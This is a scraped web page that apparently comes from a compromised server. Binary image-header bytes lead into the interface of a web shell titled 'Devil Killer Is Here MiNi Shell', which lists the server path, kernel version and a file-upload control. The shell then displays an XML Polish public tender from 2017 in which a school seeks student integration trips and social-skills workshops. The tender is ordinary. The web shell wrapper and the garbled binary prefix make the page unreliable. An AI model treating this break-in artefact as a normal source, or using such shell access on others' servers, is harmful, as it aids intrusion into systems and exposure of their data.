JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17276_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17276</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Zespół Szkół im. C.K.Norwida</nazwa><ulica>ul. 3 Maja</ulica><nr_domu>24</nr_domu><nr_miesz></nr_miesz><miejscowosc>Nowe Miasto Lubawskie</miejscowosc><kod_poczt>13300 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>warmińsko-mazurskie</wojewodztwo><tel>0-56 472-60-20</tel><fax>0-56 472 60 37</fax><email>z.s.imc.k.norwida@wp.pl</email><internet></internet><adres_strony_internetowej_narzedzia>http://norwid.-bip.org.pl</adres_strony_internetowej_narzedzia><adres_strony_url>www.norwid.eu</adres_strony_url><podmiot2c></podmiot2c><regon>68091100000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>SOUL-Szkoła Otwarych Umysłów licealistów</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>http://norwid.e-bip.org.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>http://norwid.e-bip.org.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert /><wymagane_przeslanie_ofert_inny></wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres></dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>„Zorganizowanie i przeprowadzenie wyjazdów integracyjnych   w ramach treningu kompetencji społecznych  skierowanych do osób będących Uczestnikami projektu pn. „ SOUL – Szkoła Otwartych Umysłów Licealistów" </nazwa_zamowienia><numer_referencyjny>OK.III.271.1.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>Część  nr 1 zamówienia

Szczegółowy opis przedmiotu zamówienia: 

Zorganizowanie i przeprowadzenie następujących wyjazdów integracyjnych w ramach 
TRENING KOMPETENCJI SPOŁECZNYCH:


15 wyjazdów x 3 dni  x 1 klasa x 25 os. (łącznie 375 osób) dla klas I do ośrodka specjalizującego się w innowacyjnych, aktywnych metodach pracy nad kompetencjami społecznymi, zajęcia będą odbywać się w  trzech podgrupach, do 10 osób każda podgrupa, łącznie 1080 h warsztatów ( 1 klasa x 3 podgrupy x 3 dni  x 8 h x 15 wyjazdów) dotyczyć między innymi komunikacji, współpracy w grupie, radzenia sobie z emocjami i stresem, asertywności. Prowadzone warsztatowo: ćwiczenia, praca w grupie i parach, wystąpienia przed grupą.

Rok 2017 –  10 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 250 osób) 
Rok 2018 – 5 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 125 osób) 


Wykonawca w ramach zamówienia zobowiązany będzie zapewnić:


•	przestronną salę z drewnianą podłogą o powierzchni min. 140 m ²  umożliwiającą     przeprowadzenie zajęć z tańca,
•	minimum trzy sale szkoleniowe zapewniające warunki  do przeprowadzenia warsztatów dla grupy 8-9 osobowa każda,
•	niezbędny sprzęt (kamera, projektor, ekran, laptop, nagłośnienie, aparat fotograficzny, mikrofony, oświetlenie sceniczne – reflektory itp.),
•	niezbędny sprzęt i materiały warsztatowe  ( np. bębny, szczudła, kaski, ochraniacze, treningowy sprzęt do tańca z ogniem, sprzęt palący do tańca, parafinę do tańca z ogniem, łuki, strzały, tarcze, rekwizyty teatralne, garderobę ze strojami itp.)
•	oddzielne pomieszczenie do spożywania posiłków ( stołówka )
•	w trakcie pobytu uczestników projektu  w ośrodku może przebywać tylko 1 grupa 25 osobowa,
•	miejsce noclegowe dla 25 osobowej grupy młodzieży, uwzględnić należy grupę   mieszaną 
      ( dziewczęta i chłopcy ),
•	łazienki ( damskie i męskie )  w budynku, w którym zakwaterowana będzie młodzież,  umywalki, natryski, WC, ciepłą i zimną wodę bez ograniczeń dla grupy 25 osobowej dziewcząt i chłopców oraz 1 opiekuna ze strony zamawiającego,
•	całodobowe wyżywienie dla 25 osobowej grupy ( minimum trzy posiłki: śniadanie, obiad, kolacja) posiłki powinny być podane w sposób estetyczny, spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia,  
•	w czasie pobytu młodzieży w punktach gastronomicznych na terenie całego obiektu nie będzie sprzedawany alkohol,
•	wydzielone miejsce na ognisko wraz z terenem zielonym wokół obiektu umożliwiającym zajęcia na świeżym powietrzu ( np. wiata, altana itp. ), boisko do piłki  siatkowej, miejsce do gry w piłkę nożną,  sprzęt sportowy ( piłki itp. ) 
•	zapewnienie młodzieży miejsca do spędzania wolnego czasu w budynku (np: świetlica, sala kominkowa itp.),
•	dostęp do pomieszczenia z czajnikiem  w celu zrobienia kawy, herbaty w wolnym czasie,
•	możliwość użytkowania w ośrodku pomieszczeń kuchennych (np. aneks kuchenny z piekarnikiem w celu  – prowadzenie zajęć  warsztatowych z wykorzystaniem sprzętu kuchennego (  pieczenie chleba itp.),
•	umożliwi każdorazowo udział w warsztatach 1 osoby ze strony Zamawiającego, któremu zapewni nocleg i wyżywienie.

Oświadczenie, o dysponowaniu miejscem ( ośrodkiem, pensjonatem itp.) w którym będzie można przeprowadzić wyjazdy integracyjne   w ramach treningu kompetencji społecznych  , spełniającym  powyższe warunki.

Koszty transportu uczestników do miejsca prowadzenia warsztatów ponosi ZAMAWIAJĄCY. Ze względu na ograniczone środki finansowe przeznaczone na transport uczestników miejsce wykonania zamówienia nie powinno być oddalone od Nowego Miasta Lubawskiego dalej niż 30 km. Zamawiający nie ponosi żadnych kosztów w związku z przejazdem do miejsca zamówienia osób wykonujących zamówienie ze strony Wykonawcy.

TERMINY wyjazdów w ramach  TRENINGU KOMPETENCJI SPOŁECZNYCH  w roku 2017

13 – 15 lutego 2017 roku (termin uzależniony od daty podpisania umowy) 
15 – 17 lutego 2017 roku
20 – 22 lutego 2017 roku
13 – 15 marca 2017 roku
15 – 17 marca 2017 roku

Termin kolejnych 5  wyjazdów do uzgodnienia powinny odbyć się na przełomie  września/października 2017 roku.

TERMINY wyjazdów w ramach  TRENINGU KOMPETENCJI SPOŁECZNYCH  w roku 2018

Terminy 5 wyjazdów  do uzgodnienia powinny odbyć się na  przełomie września/października 2018 roku

Część  nr 2 zamówienia

Szczegółowy opis przedmiotu zamówienia: 
zorganizowanie i przeprowadzenie warsztatów w ramach
TRENINGU KOMPETENCJI SPOŁECZNYCH:


REALIZACJA Warsztatów Treningu Kompetencji Społecznych w ramach 15 wyjazdów x 3 dni  x 1 klasa x 25 os. (łącznie 375 osób) dla klas I w ośrodku specjalizującym się w innowacyjnych, aktywnych metodach pracy nad kompetencjami społecznymi,  zajęcia będą odbywać się w  trzech podgrupach, do 10 osób każda podgrupa, łącznie 1080 h warsztatów ( 1 klasa x 3 podgrupy x 3 dni  x 8 h x 15 wyjazdów) dotyczyć między innymi komunikacji, współpracy w grupie, radzenia sobie z emocjami i stresem, asertywności. Prowadzone warsztatowo: ćwiczenia, praca w grupie i parach, wystąpienia przed grupą.

Rok 2017 – w trakcie 10 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 250 osób) łącznie 720 godzin warsztatów
Rok 2018 – w trakcie 5 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 125 osób) łącznie 360 godzin warsztatów


Wykonawca w ramach zamówienia zobowiązany będzie zapewnić:



•	wykwalifikowaną opiekę podczas pobytu młodzieży na wyjazdowych warsztatach dla grupy 25 osobowej  w trakcie zajęć warsztatowych  ( instruktorzy min. 3 osoby – 1 instruktor będzie miał pod opieką jedną podgrupę liczącą 8-9 osób każda.
•	Prowadzić listę obecności uczestników warsztatów, oznakowaną zgodnie z zasadami dotyczącymi promocji projektów współfinansowanych z Europejskiego Funduszu Społecznego.
•	Umożliwić każdorazowo udział w warsztatach 1 osoby ze strony Zamawiającego.
•	Wykonawca zobowiązany jest dołączyć do oferty proponowany program zajęć warsztatowych wraz z opisem proponowanych innowacyjnych form oraz harmonogram zajęć dla grupy 25 osobowej z uwzględnieniem 3 podgrup 8-9 osobowej.



Koszty transportu uczestników do miejsca prowadzenia warsztatów ponosi ZAMAWIAJĄCY, ZAMAWIAJĄCY wskaże WYKONAWCY miejsce, w którym przeprowadzi  Warsztaty Treningu Kompetencji Społecznych.

TERMINY wyjazdów w ramach  TRENINGU KOMPETENCJI SPOŁECZNYCH  w roku 2017 na których Wykonawca będzie zobowiązany przeprowadzić warsztaty

13 – 15 lutego 2017 roku (termin uzależniony od daty podpisania umowy) 
15 – 17 lutego 2017 roku
20 – 22 lutego 2017 roku
13 – 15 marca 2017 roku
15 – 17 marca 2017 roku

Termin kolejnych 5  wyjazdów do uzgodnienia powinny odbyć się na przełomie  września/października 2017 roku.

TERMINY wyjazdów w ramach  TRENINGU KOMPETENCJI SPOŁECZNYCH  w roku 2018 na których Wykonawca będzie zobowiązany przeprowadzić warsztaty


Terminy 5 wyjazdów  do uzgodnienia powinny odbyć się na  przełomie września/października 2018 roku

</przedmiot_zam><cpv1c>55270000-3</cpv1c><cpv2c>80570000-0</cpv2c><okres2c>31/10/2018</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Zamawiający  przewiduje  możliwość dokonania  najpierw  oceny  ofert,  a  następnie  zbadania,  czy Wykonawca którego oferta została oceniona jako najkorzystniejsza nie podlega wykluczeniu oraz spełnia warunki  udziału w  postępowaniu.  Jeżeli  Wykonawca,  którego  oferta została oceniona jako najkorzystniejsza, uchyli się od zawarcia umowy Zamawiający zbada, czy nie podlega wykluczeniu oraz czy spełnia warunki udziału w postępowaniu Wykonawca, który złożył ofertę najwyżej ocenioną spośród pozostałych ofert. (art. 24 aa ust. 1 i 2 Pzp).</informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow></sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>dysponuje co najmniej trzema osobami, które przeprowadzą warsztaty z zakresu innowacyjnych, aktywnych metod pracy opisane w punkcie 3.4 SIWZ posiadająca co najmniej:
- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, 
- przeprowadziła co najmniej jedne warsztaty w podobnym zakresie tematycznym  dla min grupy 
9 osób obejmujące minimum 12 godzin
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen></wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1 Do oferty Wykonawca musi dołączyć: 
aktualne  na  dzień składania  ofert  oświadczenia  w  zakresie  wskazanym  w załączniku  nr 2 do SIWZ i Załączniku nr 3 do SIWZ - stanowią wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu i nie podlega wykluczeniu oraz załącznik nr 4 do SIWZ wypełniony formularz ofertowy – według wzoru stanowiącego Załącznik nr 1 do SIWZ.
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione></inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci>Zamawiający przed udzieleniem zmówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia  wyznaczonym terminie, nie krótszym niż 5 dni - kopii dokumentów potwierdzających informacje wpisane  w załączniku  nr 4 do SIWZ</wykaz_potwierdzenie_okolicznosci><wadium></wadium><czy_wadium>N</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow>N</czy_ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie>N</czy_obejmuje_ustanowienie><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow>N</czy_pobranie_umowy_ramowej_dynamicznego_katalogow><czy_umowy_ramowej_dynamicznego_katalogow>N</czy_umowy_ramowej_dynamicznego_katalogow><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi oraz okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy, zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron, zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od wykonawcy po uzyskaniu zgody zamawiającego.
Postanowienia umowy zawarto we  wzorze umowy, który stanowi załącznik
nr 6 do SIWZ.
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci>0</ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>08/02/2017</data_skl><godz_skl>9:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>N</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie>N</IV_3_1_Przewidziane_jest_zastrzezenie><IV_3_1_Przewidziany_podzial>N</IV_3_1_Przewidziany_podzial><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu>N</IV_3_2_PodzialDialogu><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji>N</IV_3_3_PodzialNegocjacji><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu /><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>N</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Zorganizowani i przeprowdzenie wyjazdów integracyjnyh w ramach treningu kompetencji społezych</nazwa><opis>Zorganizowanie i przeprowadzenie następujących wyjazdów integracyjnych w ramach TRENING KOMPETENCJI SPOŁECZNYCH:
15 wyjazdów x 3 dni  x 1 klasa x 25 os. (łącznie 375 osób) dla klas I do ośrodka specjalizującego się w innowacyjnych, aktywnych metodach pracy nad kompetencjami społecznymi, zajęcia będą odbywać się w  trzech podgrupach, do 10 osób każda podgrupa, łącznie 1080 h warsztatów ( 1 klasa x 3 podgrupy x 3 dni  x 8 h x 15 wyjazdów) dotyczyć między innymi komunikacji, współpracy w grupie, radzenia sobie z emocjami i stresem, asertywności. Prowadzone warsztatowo: ćwiczenia, praca w grupie i parach, wystąpienia przed grupą.

Rok 2017 –  10 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 250 osób) 
Rok 2018 – 5 wyjazdów x 3 dni x 1 klasa x 25 osób (łącznie 125 osób) 


Wykonawca w ramach zamówienia zobowiązany będzie zapewnić:


•	przestronną salę z drewnianą podłogą o powierzchni min. 140 m ²  umożliwiającą     przeprowadzenie zajęć z tańca,
•	minimum trzy sale szkoleniowe zapewniające warunki  do przeprowadzenia warsztatów dla grupy 8-9 osobowa każda,
•	niezbędny sprzęt (kamera, projektor, ekran, laptop, nagłośnienie, aparat fotograficzny, mikrofony, oświetlenie sceniczne – reflektory itp.),
•	niezbędny sprzęt i materiały warsztatowe  ( np. bębny, szczudła, kaski, ochraniacze, treningowy sprzęt do tańca z ogniem, sprzęt palący do tańca, parafinę do tańca z ogniem, łuki, strzały, tarcze, rekwizyty teatralne, garderobę ze strojami itp.)
•	oddzielne pomieszczenie do spożywania posiłków ( stołówka )
•	w trakcie pobytu uczestników projektu  w ośrodku może przebywać tylko 1 grupa 25 osobowa,
•	miejsce noclegowe dla 25 osobowej grupy młodzieży, uwzględnić należy grupę   mieszaną 
      ( dziewczęta i chłopcy ),
